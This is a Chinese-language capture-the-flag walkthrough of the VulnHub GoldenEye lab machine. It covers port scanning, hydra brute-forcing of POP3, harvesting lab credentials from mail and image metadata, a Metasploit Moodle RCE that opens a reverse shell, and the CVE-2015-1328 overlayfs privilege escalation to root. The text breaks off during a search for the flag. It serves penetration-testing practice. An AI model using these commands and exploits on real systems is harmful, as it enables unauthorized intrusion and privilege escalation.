项目Goldeneye

1
2
3
4
5
6
7
8
项目地址:https://www.vulnhub.com/entry/goldeneye-1,240/

Name: GoldenEye: 1
Date release: 4 May 2018
Author: creosote
Series: GoldenEye


1
2
3
4
5
6
7
8
Description

I recently got done creating an OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.

I'd rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there's a hint of CTF flavor.

I've created and validated on VMware and VirtualBox. You won't need any extra tools other than what's on Kali by default. Will need to be setup as Host-Only, and on VMware you may need to click "retry" if prompted, upon initially starting it up because of formatting.
## Changelog Beta - 2018-05-02 v1 - 2018-05-04

信息搜集

获取项目地址

1
nmap -sP 10.0.0.0/24

返回

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~]
└─# nmap -sP 10.0.0.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 09:58 CST
Nmap scan report for OpenWrt.lan (10.0.0.1)
Host is up (0.00073s latency).
MAC Address: 00:15:5D:64:C0:01 (Microsoft)
Nmap scan report for PC-A.lan (10.0.0.2)
Host is up (0.00045s latency).
MAC Address: 00:15:5D:64:C0:00 (Microsoft)
Nmap scan report for ubuntu.lan (10.0.0.101)
Host is up (0.00044s latency).
MAC Address: 00:0C:29:75:99:20 (VMware)
Nmap scan report for kali.lan (10.0.0.3)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.07 seconds

确定项目ip为 10.0.0.101

扫描项目端口

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~]
└─# nmap 10.0.0.101
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 13:36 CST
Nmap scan report for 01.lan (10.0.0.101)
Host is up (0.00055s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
MAC Address: 00:0C:29:75:99:20 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

发现开放了80端口 25 smtp端口

目前信息

1
2
ip:10.0.0.101
port:25,80

访问80端口

image-20220819134248361

得到信息 /sev-home/

访问此页面 有个弹窗 是个登录页面

接着查看主页面源代码 发现js文件有点奇怪

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
var data = [
{
GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
}
];

//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//

var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
var currentElementId = allElements[j].id;
var currentElementIdContent = data[0][currentElementId];
var element = document.getElementById(currentElementId);
var devTypeText = currentElementIdContent;


var i = 0, isTag, text;
(function type() {
text = devTypeText.slice(0, ++i);
if (text === devTypeText) return;
element.innerHTML = text + `<span class='blinker'>&#32;</span>`;
var char = text.slice(-1);
if (char === "<") isTag = true;
if (char === ">") isTag = false;
if (isTag) return type();
setTimeout(type, 60);
})();
}

1
2
3
4
5
6
7
8
9
//鲍里斯,确保你更新了你的默认密码。 
//我的消息来源说MI6可能计划渗透。
//留意任何可疑的网络流量......
//
//我在下面给你编码了 p@ssword...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97; &#99;&#107;&#51;&#114;
//
//顺便说一句,娜塔莉亚说她可以破解你的密码

取出有用信息

1
2
3
4
5
6
7
8
9
10
11
已知信息
ip:10.0.0.101
port:25,80
login:/sev-home/
password:&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
此password不难看出为html实体编码
解码后得到:InvincibleHack3r

password:InvincibleHack3r
name1=Boris
name2=Natalya

尝试用name 和password 进行登入

最终 name=boris;password=InvincibleHack3r登陆成功

image-20220819153612606

1
2
3
4
5
GoldenEye 是一个绝密的苏联东方武器项目。  由于您有权访问,因此您肯定持有绝密许可并有资格成为经过认证的 GoldenEye 网络运营商 (GNO)

请向合格的 GNO 主管发送电子邮件,以接受在线 GoldenEye 操作员培训,成为 GoldenEye 系统的管理员

请记住,由于默默无闻的安全性非常有效,我们已将 pop3 服务配置为在非常高的非默认端口上运行

根据信息能得知还有隐藏的端口 为pop3服务

扫描隐藏端口服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
nmap -p- 10.0.0.101

┌──(root㉿kali)-[~/100project/001]
└─# nmap -p- 10.0.0.101
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 15:37 CST
Nmap scan report for 01.lan (10.0.0.101)
Host is up (0.00089s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown
MAC Address: 00:0C:29:75:99:20 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.15 seconds

发现 55006 55007端口 然后继续扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root㉿kali)-[~/100project/001]
└─# nmap -p55006,55007 10.0.0.101 -sS -sV -A -T5
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 15:39 CST
Nmap scan report for 01.lan (10.0.0.101)
Host is up (0.0011s latency).

PORT STATE SERVICE VERSION
55006/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE PIPELINING UIDL USER SASL(PLAIN) CAPA RESP-CODES TOP
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
55007/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING UIDL SASL(PLAIN) STLS RESP-CODES AUTH-RESP-CODE CAPA USER TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after: 2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:75:99:20 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 1.06 ms 01.lan (10.0.0.101)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.25 seconds

能确认55006 ssl/pop3 55007 pop3

那么接着使用九头蛇爆破pop3端口

hydra 爆破pop3

1
2
3
4
5
6
7
8
# 使用上面 搜集的两个用户名进行爆破
┌──(root㉿kali)-[~/100project/001]
└─# cat success.txt
# Hydra v9.3 run at 2022-08-22 16:50:19 on 10.0.0.101 pop3 (hydra -L name.txt -P password.txt -o success.txt -t 64 -s 55007 10.0.0.101 pop3)
[55007][pop3] host: 10.0.0.101 login: boris password: secret1!
[55007][pop3] host: 10.0.0.101 login: Boris password: secret1!
[55007][pop3] host: 10.0.0.101 login: natalya password: bird
[55007][pop3] host: 10.0.0.101 login: Natalya password: bird

nc登录pop3查看邮件

boris的邮件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
┌──(root㉿kali)-[~/100project/001]
└─# nc 10.0.0.101 55007
+OK GoldenEye POP3 Electronic-Mail System
user Boris # 输入账号
+OK
pass secret1! # 输入密码
+OK Logged in.
list
+OK 3 messages:
1 544
2 373
3 921
.
retr 1 #读取邮件
+OK 544 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: [email protected]

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.

# 鲍里斯,这是管理员。您可以在此处与同事和学生进行电子交流。我不会扫描电子邮件是否存在安全风险,因为我相信你和这里的其他管理员
.
retr 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!

.
retr 3
+OK 921 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: [email protected]

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

# 鲍里斯,

# 您与我们辛迪加的合作将获得丰厚回报。附件是 GoldenEye 的最终访问代码。将它们放在此服务器根目录中的隐藏文件中,然后从该电子邮件中删除。这些访问代码只能有一组,我们需要保护它们以供最终执行。如果他们被找回并被俘虏,我们的计划将会崩溃和燃烧!

# 一旦 Xenia 进入培训站点并熟悉 GoldenEye 终端代码,我们将进入最后阶段......

PS - 保持安全,否则我们将受到威胁

natalya的邮件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
┌──(root㉿kali)-[~/100project/001]
└─# nc 10.0.0.101 55007
+OK GoldenEye POP3 Electronic-Mail System
user Natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
.
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.

#娜塔莉亚,请你不要再破坏鲍里斯的密码了。此外,您是 GNO 培训主管。一旦学生被指定给您,我将通过电子邮件发送给您。

#此外,请注意可能的网络漏洞。我们获悉 GoldenEye 正受到一个名为 Janus 的犯罪集团的追捕
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.


好的,娜塔琳,我有一个新学生要给你。由于这是一个新系统,如果您发现任何配置问题,请让我或鲍里斯知道,尤其是它与安全性有关...即使不是,只需以“安全性”为幌子输入...它会毫不费力地升级变更单 :)

好的,用户信用是:

用户名:xenia
密码:RCP90rulez!

Boris 验证了她是一个有效的承包商,所以只需创建帐户,好吗?

如果您没有外部内部域的 URL:severnaya-station.com/gnocertdir
**请确保编辑您的主机文件,因为您通常在远程离线工作......

由于您是 Linux 用户,只需将此服务器 IP 指向 /etc/hosts 中的 severnaya-station.com
1
2
3
4
信息
url:severnaya-station.com/gnocertdir
username:xenia
password:RCP90rulez!

给项目地址绑定host

image-20220823134252509

访问severnaya-station.com

image-20220823135223312

这是一个php站点 moodle cms

image-20220823151021217

image-20220823151402552

发现email username doak

然后继续hydra爆破

得到密码 goat

nc登录doak

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(root㉿kali)-[~/100project/001]
└─# nc 10.0.0.101 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

.

得到用户密码dr_doak:4England!

登录dr_dock账号

发现特殊文件

image-20220823153624358

image-20220823153659039

发现url /dir007key/for-007.jpg

下载图片分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(root㉿kali)-[~/100project/001]
└─# wget http://severnaya-station.com/dir007key/for-007.jpg
--2022-08-23 15:38:48-- http://severnaya-station.com/dir007key/for-007.jpg
正在解析主机 severnaya-station.com (severnaya-station.com)... 10.0.0.101
正在连接 severnaya-station.com (severnaya-station.com)|10.0.0.101|:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:14896 (15K) [image/jpeg]
正在保存至: “for-007.jpg”

for-007.jpg 100%[=================================================>] 14.55K --.-KB/s 用时 0s

2022-08-23 15:38:48 (111 MB/s) - 已保存 “for-007.jpg” [14896/14896])

┌──(root㉿kali)-[~/100project/001]
└─# exiftool for-007.jpg
ExifTool Version Number : 12.44
File Name : for-007.jpg
Directory : .
File Size : 15 kB
File Modification Date/Time : 2018:04:25 08:40:02+08:00
File Access Date/Time : 2022:08:23 15:39:33+08:00
File Inode Change Date/Time : 2022:08:23 15:38:48+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
X Resolution : 300
Y Resolution : 300
Exif Byte Order : Big-endian (Motorola, MM)
Image Description : eFdpbnRlcjE5OTV4IQ==
Make : GoldenEye
Resolution Unit : inches
Software : linux
Artist : For James
Y Cb Cr Positioning : Centered
Exif Version : 0231
Components Configuration : Y, Cb, Cr, -
User Comment : For 007
Flashpix Version : 0100
Image Width : 313
Image Height : 212
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 313x212
Megapixels : 0.066

发现描述里的内容有点特殊,有两个==号 猜测可能经过base64编码

尝试base64解码

得到xWinter1995x!

使用得到的密码进行admin登录

登录成功

image-20220823154942844

信息搜集汇总

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
ip:10.0.0.101
host:severnaya-station.com
posts:25,80,55006,5007

cms:2.2.3 moodle

账户密码
url: 10.0.0.101 55007
boris:secret1!
natalya:bird
doak:goat

url:severnaya-station.com/gnocertdir
xenia:RCP90rulez!
dr_doak:4England!
admin:xWinter1995x!

漏洞利用

已知 cms为2.2.3 moodle

谷歌搜索moodle 2.2.3 exploit

在exploit-db找到 cve2013-3630

使用msf进行漏洞利用

搜索exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(root㉿kali)-[~]
└─# msfconsole

____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
[% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
[% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
[% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


=[ metasploit v6.2.11-dev ]
+ -- --=[ 2233 exploits - 1179 auxiliary - 398 post ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit tip: After running db_nmap, be sure to
check out the result of hosts and services

msf6 > search moodle

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/moodle_admin_shell_upload 2019-04-28 excellent Yes Moodle Admin Shell Upload
1 exploit/multi/http/moodle_spelling_binary_rce 2013-10-30 excellent Yes Moodle Authenticated Spelling Binary RCE
2 exploit/multi/http/moodle_spelling_path_rce 2021-06-22 excellent Yes Moodle SpellChecker Path Authenticated Remote Command Execution
3 exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce 2020-07-20 good Yes Moodle Teacher Enrollment Privilege Escalation to RCE


Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce

也可以搜索 cve 2013-3630

1
2
3
4
5
6
7
8
9
10
11
12
msf6 > search cve 2013-3630

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/moodle_spelling_binary_rce 2013-10-30 excellent Yes Moodle Authenticated Spelling Binary RCE
1 exploit/multi/http/moodle_spelling_path_rce 2021-06-22 excellent Yes Moodle SpellChecker Path Authenticated Remote Command Execution


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/moodle_spelling_path_rce
使用exp
1
2
3
4
5
6
7
8
9
10
msfconsole                        ---进入MSF框架攻击界面
search moodle ---查找 moodle类型 攻击的模块
use 0 ---调用0 exploit/multi/http/moodle_cmd_exec调用攻击脚本
set username admin ---设置用户名:admin
set password xWinter1995x! ---设置密码:xWinter1995x!
set rhost severnaya-station.com ---设置:rhosts severnaya-station.com
set targeturi /gnocertdir ---设置目录: /gnocertdir
set payload cmd/unix/reverse ---设置payload:cmd/unix/reverse
set lhost 10.0.0.3 ---设置:lhost 10.0.0.3(需要本地IP)
run ----执行命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
msf6 > use 0
msf6 exploit(multi/http/moodle_spelling_binary_rce) > show options

Module options (exploit/multi/http/moodle_spelling_binary_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using
-Metasploit
RPORT 80 yes The target port (TCP)
SESSKEY no The session key of the user to impersonate
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /moodle/ yes The URI of the Moodle installation
USERNAME admin yes Username to authenticate with
VHOST no HTTP server virtual host


Exploit target:

Id Name
-- ----
0 Automatic


msf6 exploit(multi/http/moodle_spelling_binary_rce) > set password xWinter1995x!
password => xWinter1995x!
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set rhost severnaya-station.com
rhost => severnaya-station.com
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set targeturi /gnocertdir
targeturi => /gnocertdir
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set lhost 10.0.0.3
lhost => 10.0.0.3
msf6 exploit(multi/http/moodle_spelling_binary_rce) > run

[*] Started reverse TCP double handler on 10.0.0.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Exploit completed, but no session was created.

发现没有运行成功

查看exp需要pspellshell

image-20220826111358749

使用admin登录http://severnaya-station.com/gnocertdir

在settings->Site administration->Plugins->Text editors->YinyMCE HTML editor处

修改speel engine 为pspellshell

然后保存 msf执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
msf6 exploit(multi/http/moodle_spelling_binary_rce) > run

[*] Started reverse TCP double handler on 10.0.0.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7YPpFMOnfF8gG8B3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "7YPpFMOnfF8gG8B3\r\n"
[*] Matching...
[*] B is input...
whoami[*] Command shell session 2 opened (10.0.0.3:4444 -> 10.0.0.101:47575) at 2022-08-26 11:16:45 +0800


www-data

然后执行tty 因为获得的权限无框架:执行

查看有没有安装python

1
2
whereis python
python: /usr/bin/python3.4m /usr/bin/python /usr/bin/python3.4 /usr/bin/python2.7 /etc/python /etc/python3.4 /etc/python2.7 /usr/lib/python3.4 /usr/lib/python2.7 /usr/bin/X11/python3.4m /usr/bin/X11/python /usr/bin/X11/python3.4 /usr/bin/X11/python2.7 /usr/local/lib/python3.4 /usr/local/lib/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz

使用python 获得tty shell

python -c "import pty;pty.spawn('/bin/bash')"

查看内核版本

1
2
3
4
5
6
7
python -c "import pty;pty.spawn('/bin/bash')"
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cd /tmp
cd /tmp
www-data@01:/tmp$ uname -a
uname -a
Linux 01 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@01:/tmp$

提权

已知内核版本为3.13.0

搜索3.13.0 提权

在exploit-db找到 cve 2015-1328

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24

查看代码 需要使用gcc编译

查看有没有gcc环境

1
2
3
www-data@01:/tmp$ gcc
gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'

没有 查看有没有cc环境

1
2
3
4
www-data@01:/tmp$ cc
cc
clang: error: no input files
www-data@01:/tmp$

报错显示没有输入文件,所以有

修改exp,gcc修改为cc

image-20220826120348707

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
www-data@01:/tmp$ cc 1.c -o exp
cc 1.c -o exp
1.c:62:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
1.c:74:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
1.c:79:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
1.c:85:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
1.c:95:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
www-data@01:/tmp$ ./exp
./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#

提权成功

接着查找flag了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
# find / -name "*flag*"
find / -name "*flag*"
/usr/lib/llvm-3.4/build/autoconf/m4/cxx_flag_check.m4
/usr/lib/perl/5.18.2/bits/waitflags.ph
/usr/share/help-langpack/en_GB/evolution/mail-follow-up-flag.page
/usr/share/help-langpack/en_GB/gnome-mines/flags.page
/usr/share/man/man3/fesetexceptflag.3.gz
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man1/doveadm-flags.1.gz
/usr/src/linux-headers-3.13.0-32/scripts/coccinelle/locks/flags.cocci
/usr/src/linux-headers-3.13.0-32/arch/c6x/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/frv/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/parisc/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/score/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/s390/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/um/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/unicore32/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/x86/kernel/cpu/mkcapflags.sh
/usr/src/linux-headers-3.13.0-32/arch/x86/include/asm/processor-flags.h
/usr/src/linux-headers-3.13.0-32/arch/x86/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/x86/include/uapi/asm/processor-flags.h
/usr/src/linux-headers-3.13.0-32/arch/mn10300/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/openrisc/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/hexagon/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/alpha/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/sh/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/metag/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/m32r/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/arm64/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/powerpc/include/asm/irqflags.h
/usr/src/linux-headers-3.13.0-32/arch/arm/include/asm/irqflags.h
